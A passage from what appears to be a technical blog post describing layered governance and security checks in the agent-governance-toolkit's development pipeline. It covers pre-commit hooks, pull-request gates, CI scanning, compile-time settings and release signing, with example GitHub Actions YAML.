&lt;P&gt;Files matching plugin.json, plugin.yaml, plugin.yml&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;To adopt these hooks, add AGT as a pre-commit hook source:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# .pre-commit-config.yaml
repos:
  - repo: https://github.com/microsoft/agent-governance-toolkit
    rev: main  # pin to a release tag in production
    hooks:
      - id: validate-policy
      - id: validate-plugin-manifest
      - id: evaluate-plugin-policy
        args: ['--policy', 'policies/marketplace-policy.yaml']&lt;/LI-CODE&gt;
&lt;P&gt;Then install and run:&lt;/P&gt;
&lt;LI-CODE lang="powershell"&gt;pip install pre-commit
pre-commit install
pre-commit run --all-files&lt;/LI-CODE&gt;
&lt;H2&gt;Extended Quality Gates&lt;/H2&gt;
&lt;P&gt;Beyond schema validation, we built a pre-commit rollout template (&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/operations/pre-commit-hook-template.md" target="_blank"&gt;see the full example in the repository&lt;/A&gt;) with additional governance-specific quality gates designed to help prevent common security anti-patterns from entering the codebase:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Policy validation (agt-validate): &lt;/STRONG&gt;Runs the full AGT policy CLI in strict mode, catching not just schema errors but semantic issues like conflicting rules.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Health check (agt-doctor):&lt;/STRONG&gt; Runs on pre-push (before code leaves the machine entirely), performing a broader health check of the governance configuration.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Plugin metadata check (agency-json-required): &lt;/STRONG&gt;Ensures every plugin directory contains the required agency.json metadata file.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Stub detection (no-stubs): &lt;/STRONG&gt;Blocks TODO, FIXME, HACK, and raise NotImplementedError markers in staged production code. Test files are excluded.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Unauthorized crypto detection (no-custom-crypto): &lt;/STRONG&gt;Blocks raw cryptographic imports (hashlib, hmac, crypto.subtle, System.Security.Cryptography, ring, ed25519-dalek) outside designated security modules. This helps ensure all cryptographic operations go through the audited AGT signing libraries.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Secret scanning (detect-secrets):&lt;/STRONG&gt; Integrates Yelp's detect-secrets for pattern-based secret detection on every commit.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Phased Rollout for Teams&lt;/H2&gt;
&lt;P&gt;Adopting pre-commit hooks across a team requires a thoughtful rollout. The AGT documentation includes a &lt;A class="lia-external-url" href="http://%20https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/operations/advisory-to-blocking-graduation.md" target="_blank"&gt;phased adoption guide&lt;/A&gt;:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Week 1: &lt;/STRONG&gt;Install hooks in permissive mode. Hooks warn on violations but do not block the commit. This lets developers see what would be caught without disrupting workflow.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Week 2:&lt;/STRONG&gt; Switch to strict mode for policy validation only. Policy files must pass schema validation to be committed.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Week 3: &lt;/STRONG&gt;Enable all hooks as blocking. Stubs, unauthorized crypto, and secrets are now blocked at commit time.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Week 4: &lt;/STRONG&gt;Graduate to full blocking mode and remove the permissive fallback.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;This approach helps teams build confidence in the governance tooling before it becomes a hard gate.&lt;/P&gt;
&lt;H1&gt;Stage 2: PR-Time Gates&lt;/H1&gt;
&lt;P&gt;Pre-commit hooks catch issues on the developer's machine, but they can be bypassed (force push, direct GitHub edits, hooks not installed). PR-time gates provide the second layer of defense, running in GitHub Actions on every pull request before merge is allowed.&lt;/P&gt;
&lt;H2&gt;Governance Attestation&lt;/H2&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/tree/main/action/governance-attestation" target="_blank"&gt;Governance Attestation action&lt;/A&gt; validates that PR authors have completed a structured attestation checklist before their code can merge. The default checklist covers seven sections:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Security review&lt;/LI&gt;
&lt;LI&gt;Privacy review&lt;/LI&gt;
&lt;LI&gt;Legal review&lt;/LI&gt;
&lt;LI&gt;Responsible AI review&lt;/LI&gt;
&lt;LI&gt;Accessibility review&lt;/LI&gt;
&lt;LI&gt;Release Readiness / Safe Deployment&lt;/LI&gt;
&lt;LI&gt;Org-specific Launch Gates&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;The action is fully configurable. Organizations can customize the required sections, set a minimum PR body length, and choose their own attestation format. Outputs include the validation status, a list of errors for missing sections, and a JSON mapping of sections to checkbox counts.&lt;/P&gt;
&lt;P&gt;Here is an example workflow:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# .github/workflows/pr-governance.yml
name: PR Governance
on:
  pull_request:
    types: [opened, edited, synchronize]

jobs:
  attestation:
    runs-on: ubuntu-latest
    steps:
      - uses: microsoft/agent-governance-toolkit/action/governance-attestation@main
        with:
          required-sections: |
            1) Security review
            2) Privacy review
            3) Responsible AI review&lt;/LI-CODE&gt;
&lt;H2&gt;Dependency Review&lt;/H2&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/dependency-review.yml" target="_blank"&gt;dependency review workflow&lt;/A&gt; helps block PRs that introduce dependencies with known CVEs or disallowed licenses. It uses the GitHub dependency-review-action with a curated license allowlist:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;- uses: actions/dependency-review-action@v4
  with:
    fail-on-severity: moderate
    comment-summary-in-pr: always
    allow-licenses: &amp;gt;
      MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause, ISC,
      PSF-2.0, Python-2.0, 0BSD, Unlicense, CC0-1.0,
      CC-BY-4.0, Zlib, BSL-1.0, MPL-2.0&lt;/LI-CODE&gt;
&lt;P&gt;This runs on every PR that touches dependency manifests (package.json, Cargo.toml, pyproject.toml, requirements.txt). Dependencies with moderate or higher CVEs are flagged, and dependencies with licenses not on the allowlist are blocked.&lt;/P&gt;
&lt;H2&gt;Secret Scanning&lt;/H2&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/secret-scanning.yml" target="_blank"&gt;secret scanning workflow&lt;/A&gt; runs on every PR to the main branch and on a weekly schedule. It combines two complementary approaches:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Gitleaks: Pattern-based secret detection across the full git history, catching API keys, tokens, and credentials that may have been committed at any point.&lt;/LI&gt;
&lt;LI&gt;High-entropy string scanning: Regex-based detection of common secret patterns including GitHub tokens (ghp_, gho_), AWS access keys (AKIA), Slack tokens (xox), and base64-encoded strings with high entropy.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Supply Chain Integrity&lt;/H2&gt;
&lt;P&gt;A dedicated &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/supply-chain-check.yml" target="_blank"&gt;supply chain check workflow&lt;/A&gt; triggers when dependency manifest files change. It enforces two rules that help prevent supply chain attacks:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Exact version pinning: No ^ or ~ version ranges in package.json files. This prevents unexpected minor/patch version updates that could introduce compromised code.&lt;/LI&gt;
&lt;LI&gt;Lockfile presence: Every package directory with dependencies must have a corresponding lockfile (package-lock.json, pnpm-lock.yaml, or yarn.lock). Lockfiles help ensure reproducible builds with verified integrity hashes.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Quality Gates&lt;/H2&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/quality-gates.yml" target="_blank"&gt;quality gates workflow&lt;/A&gt; mirrors the pre-commit hooks at the PR level, providing defense in depth. It runs four checks on every pull request:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 78.7963%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Gate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Purpose&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;No Stubs/TODOs&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Blocks TODO, FIXME, HACK markers in production code (test files excluded)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;No Unauthorized Crypto&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Blocks raw cryptographic imports outside designated security modules&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Security Audit Required&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Changes to security-sensitive paths require accompanying audit documentation&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Dependency Audit Trail&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Vendored patches must have an audit trail explaining the patch and its provenance&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;These gates catch anything that bypasses pre-commit hooks: force-pushed commits, direct GitHub web edits, commits from contributors who have not installed the hooks.&lt;/P&gt;
&lt;H1&gt;Stage 3: CI/Build-Time Governance&lt;/H1&gt;
&lt;P&gt;Once a PR passes the gate workflows, the main CI pipeline and specialized workflows perform deeper, more computationally intensive analysis.&lt;/P&gt;
&lt;H2&gt;The Governance Verify Action&lt;/H2&gt;
&lt;P&gt;The &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/tree/main/action" target="_blank"&gt;Governance Verify action&lt;/A&gt; is the primary CI-time governance check. It is a GitHub Actions composite action that installs the toolkit and runs the compliance CLI against your repository. It supports four modes:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 92.3148%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Command&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Does&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;governance-verify&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Runs the full compliance verification suite, checking governance controls and reporting how many pass&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;marketplace-verify&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Validates a plugin manifest against marketplace requirements (required fields, signing, metadata)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;policy-evaluate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Evaluates a specific policy file against a JSON context, returning the allow/deny decision with the matched rule&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;all&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Runs governance-verify, then marketplace-verify and policy-evaluate if the corresponding paths are provided&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Here is an example:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# .github/workflows/governance-ci.yml
name: Governance CI
on: [push, pull_request]

jobs:
  verify:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: microsoft/agent-governance-toolkit/action@main
        with:
          command: all
          policy-path: policies/
          manifest-path: plugin.json
          output-format: json
          fail-on-warning: 'true'&lt;/LI-CODE&gt;
&lt;P&gt;The action outputs structured data including controls-passed, controls-total, violations count, and full command output in JSON format. This makes it straightforward to integrate with dashboards, Slack notifications, or downstream decision logic.&lt;/P&gt;
&lt;H2&gt;The Security Scan Action&lt;/H2&gt;
&lt;P&gt;A &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/tree/main/action/security-scan" target="_blank"&gt;separate security scan action&lt;/A&gt; scans directories for secrets, CVEs, and dangerous code patterns. Unlike the PR-time secret scanning (which focuses on git history), this action performs deep content analysis of the current codebase:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;- uses: microsoft/agent-governance-toolkit/action/security-scan@main
  with:
    paths: 'plugins/ scripts/'
    min-severity: high
    exemptions-file: .security-exemptions.json&lt;/LI-CODE&gt;
&lt;P&gt;The action supports configurable severity thresholds (critical, high, medium, low), an exemptions file for acknowledged findings, and structured JSON output with findings-count, blocking-count, and detailed findings.&lt;/P&gt;
&lt;H2&gt;Policy Validation Workflow&lt;/H2&gt;
&lt;P&gt;A &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/policy-validation.yml" target="_blank"&gt;dedicated policy validation workflow&lt;/A&gt; triggers whenever YAML files or the policy engine source code changes. It performs two jobs in sequence:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Validate policies: Discovers all policy files matching the *policy* naming convention, then validates each file using the AGT policy CLI.&lt;/LI&gt;
&lt;LI&gt;Test policies: Runs the policy CLI unit tests to verify that policy evaluation behavior is correct after the changes.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;This ensures that policy file edits do not break the policy engine and that policy semantics are preserved.&lt;/P&gt;
&lt;H2&gt;CodeQL and Static Analysis&lt;/H2&gt;
&lt;P&gt;AGT uses &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/codeql.yml" target="_blank"&gt;GitHub's CodeQL&lt;/A&gt; for semantic static analysis of Python and TypeScript code. The CodeQL workflow runs on pushes and PRs, performing deep dataflow analysis that goes beyond pattern matching. Results are uploaded as SARIF to GitHub's Security tab, providing a centralized view of code quality issues.&lt;/P&gt;
&lt;H2&gt;Dependency Confusion Scanning&lt;/H2&gt;
&lt;P&gt;A dedicated CI job runs a dependency confusion scanner on every build. This is a targeted defense against a specific supply chain attack vector where an attacker registers a public package with the same name as an internal package. The scanner checks that:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Internal package names do not collide with public PyPI or npm packages&lt;/LI&gt;
&lt;LI&gt;Notebook pip install commands only reference packages that are registered and expected&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Workflow Security Auditing&lt;/H2&gt;
&lt;P&gt;When GitHub Actions workflow files change, a workflow security job scans for common CI/CD security issues:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Expression injection: Detects patterns like ${{ github.event.pull_request.title }} used directly in run: blocks, which can allow arbitrary code execution.&lt;/LI&gt;
&lt;LI&gt;Overly permissive permissions: Flags workflows that request more permissions than necessary.&lt;/LI&gt;
&lt;LI&gt;Unpinned action references: Detects actions referenced by branch name instead of commit SHA, which is a supply chain risk.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;.NET Binary Analysis with BinSkim&lt;/H2&gt;
&lt;P&gt;For the .NET SDK (Microsoft.AgentGovernance), the CI pipeline runs Microsoft BinSkim binary security analysis on compiled assemblies. BinSkim checks for security-relevant compiler and linker settings in compiled binaries, such as DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), and stack protection. Results are uploaded as SARIF to GitHub code scanning alongside the CodeQL results.&lt;/P&gt;
&lt;H2&gt;The ci-complete Gate Pattern&lt;/H2&gt;
&lt;P&gt;With many CI jobs that conditionally run based on path filters, AGT uses a pattern called ci-complete: a single gate job that is configured as the sole required status check in branch protection. This job runs unconditionally (if: always()), depends on all other CI jobs, and checks that none of them failed. Jobs that were skipped (because no relevant files changed) are acceptable. This pattern ensures that branch protection works correctly with conditional CI jobs, preventing the common issue where skipped jobs report as "skipped" and fail required status checks.&lt;/P&gt;
&lt;H1&gt;Language-Specific Compile-Time Enforcement&lt;/H1&gt;
&lt;P&gt;Beyond the language-agnostic CI checks, each AGT SDK uses its language's native compiler and tooling to enforce governance standards at compile time.&lt;/P&gt;
&lt;H2&gt;.NET: The Strictest Compile-Time Checks&lt;/H2&gt;
&lt;P&gt;The .NET SDK (Microsoft.AgentGovernance) enforces compile-time governance through MSBuild properties in Directory.Build.props and Directory.Build.targets, which apply automatically to every project in the SDK:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 99.9074%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Feature&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;MSBuild Property&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Effect&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Nullable reference types&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;Nullable&amp;gt;enable&amp;lt;/Nullable&amp;gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;The compiler warns on every possible null dereference, helping prevent NullReferenceException at compile time&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Warnings as errors&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;TreatWarningsAsErrors&amp;gt;true&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;All compiler warnings become build errors for packable projects; no warnings can be shipped to consumers&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Strong-name signing&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;SignAssembly&amp;gt;true&amp;lt;/SignAssembly&amp;gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Assemblies are signed with a strong-name key (AgentGovernance.snk), enabling identity verification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Deterministic builds&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;ContinuousIntegrationBuild&amp;gt;true&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Identical source code produces bit-for-bit identical binaries in CI, enabling build verification&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;SourceLink&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Microsoft.SourceLink.GitHub package&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Users can step into AGT source code when debugging, supporting transparency and auditability&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Symbol packages&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&amp;lt;IncludeSymbols&amp;gt;true&amp;lt;/IncludeSymbols&amp;gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;.snupkg symbol packages are published alongside NuGet packages for debugging support&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;H2&gt;TypeScript: Strict Compilation and Linting&lt;/H2&gt;
&lt;P&gt;The TypeScript SDK (@microsoft/agentmesh-sdk) uses strict compiler settings and ESLint for build-time governance:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Strict mode ("strict": true in tsconfig.json) &lt;/STRONG&gt;enables all strict type-checking options, including noImplicitAny, strictNullChecks, strictFunctionTypes, and strictBindCallApply.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Consistent file naming (forceConsistentCasingInFileNames) &lt;/STRONG&gt;prevents cross-platform issues where imports work on case-insensitive file systems (Windows, macOS) but fail on case-sensitive ones (Linux CI).&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Declaration generation (declaration: true with declarationMap: true) &lt;/STRONG&gt;produces .d.ts files for consumers, enabling downstream type checking.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;ESLint with @typescript-eslint &lt;/STRONG&gt;provides static analysis during the build process, catching issues beyond what the TypeScript compiler checks.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Python: Type Safety and Fast Linting&lt;/H2&gt;
&lt;P&gt;Python packages in AGT use typed package markers and static analysis tooling configured in pyproject.toml:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;py.typed marker: &lt;/STRONG&gt;Each package includes a py.typed file, signalling to type checkers (mypy, pyright, Pylance) that the package supports type checking. Consumers get type errors if they misuse the AGT API.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;mypy: &lt;/STRONG&gt;Configured as a dev dependency with project-specific settings in pyproject.toml. Provides static type checking that catches type mismatches before runtime.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;ruff: &lt;/STRONG&gt;A fast Python linter written in Rust, configured in pyproject.toml and enforced in CI. Ruff checks for hundreds of code quality rules at build time.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H1&gt;Stage 4: Release-Time Gates&lt;/H1&gt;
&lt;P&gt;Before artifacts reach users, the release pipeline adds a final layer of verification. These gates help ensure that what ships is exactly what was built, is signed by the expected publisher, and has a complete inventory of its components.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table style="width: 97.037%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Gate&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Tool&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;What It Produces&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/sbom.yml" target="_blank"&gt;&lt;STRONG&gt;SBOM generation&lt;/STRONG&gt;&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Anchore/Syft&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;SPDX and CycloneDX software bills of materials listing every component, dependency, and licence&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/publish.yml" target="_blank"&gt;&lt;STRONG&gt;Python signing&lt;/STRONG&gt;&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Sigstore&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Cryptographic signature using OpenID Connect identity, verifiable without manual key distribution&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/pipelines/esrp-publish.yml" target="_blank"&gt;&lt;STRONG&gt;.NET signing&lt;/STRONG&gt;&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;RELEASE PIPELINE&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Microsoft Authenticode and NuGet signing through the release pipeline&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/publish-containers.yml" target="_blank"&gt;&lt;STRONG&gt;Build provenance&lt;/STRONG&gt;&lt;/A&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;actions/attest-build-provenance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;SLSA provenance attestation linking the artifact to its source commit and build environment&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;SBOM attestation&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;actions/attest-sbom&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Binds the SBOM to the specific release artifact, creating a verifiable link between the inventory and the binary&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Additionally, the &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/.github/workflows/scorecard.yml" target="_blank"&gt;OpenSSF Scorecard&lt;/A&gt; runs on schedule, providing an automated security posture assessment that covers branch protection, dependency management, CI/CD practices, and more. The score is published to the OpenSSF Scorecard website, giving consumers a transparent view of the project security practices.&lt;/P&gt;
&lt;H1&gt;How It All Fits Together: Defense in Depth&lt;/H1&gt;
&lt;P&gt;This approach follows a defense-in-depth principle: &lt;STRONG&gt;every check exists at multiple layers, so that bypassing one layer does not compromise the whole system.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Secret scanning, for example, runs at three levels: detect-secrets at commit time (pre-commit hook), Gitleaks at PR time (secret scanning workflow), and the Security Scan action at CI time (content analysis). A developer who bypasses pre-commit hooks will still be caught by the PR-time gate. A contributor who force-pushes past the PR gate will still be caught by the CI pipeline.&lt;/P&gt;
&lt;P&gt;Similarly, policy validation runs at commit time (validate-policy hook), at PR time (quality gates), and at CI time (policy validation workflow). Each layer adds depth: the commit-time hook catches schema errors, the CI pipeline catches semantic issues and runs regression tests.&lt;/P&gt;
&lt;P&gt;The ci-complete gate job ties everything together. By depending on every CI job and serving as the single required status check, it ensures that no code merges to the main branch unless every applicable check has passed.&lt;/P&gt;
&lt;H1&gt;Getting Started&lt;/H1&gt;
&lt;P&gt;You can adopt AGT's shift-left governance incrementally. Here are three starting points, from lowest to highest effort:&lt;/P&gt;
&lt;H2&gt;1. Add the Governance Verify Action (5 minutes)&lt;/H2&gt;
&lt;P&gt;Add a single &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/tree/main/action" target="_blank"&gt;GitHub Actions workflow&lt;/A&gt; that runs the compliance check on every PR:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# .github/workflows/governance.yml
name: Governance
on: [pull_request]
jobs:
  verify:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: microsoft/agent-governance-toolkit/action@main
        with:
          command: governance-verify&lt;/LI-CODE&gt;
&lt;H2&gt;2. Enable Pre-Commit Hooks (15 minutes)&lt;/H2&gt;
&lt;P&gt;Add a &lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit/blob/main/docs/operations/pre-commit-hook-template.md" target="_blank"&gt;.pre-commit-config.yaml &lt;/A&gt;referencing AGT's hooks, install them, and run against all existing files to establish a baseline. Start in permissive mode and graduate to strict over four weeks.&lt;/P&gt;
&lt;H2&gt;3. Full Pipeline Integration (1-2 hours)&lt;/H2&gt;
&lt;P&gt;Add the complete set of PR-time gates (attestation, dependency review, secret scanning, supply chain checks, quality gates), configure the Security Scan action for your plugin directories, and enable SBOM generation and signing in your release workflow. The AGT repository itself serves as a reference implementation: every workflow described in this post is running in production at aka.ms/agent-governance-toolkit.&lt;/P&gt;
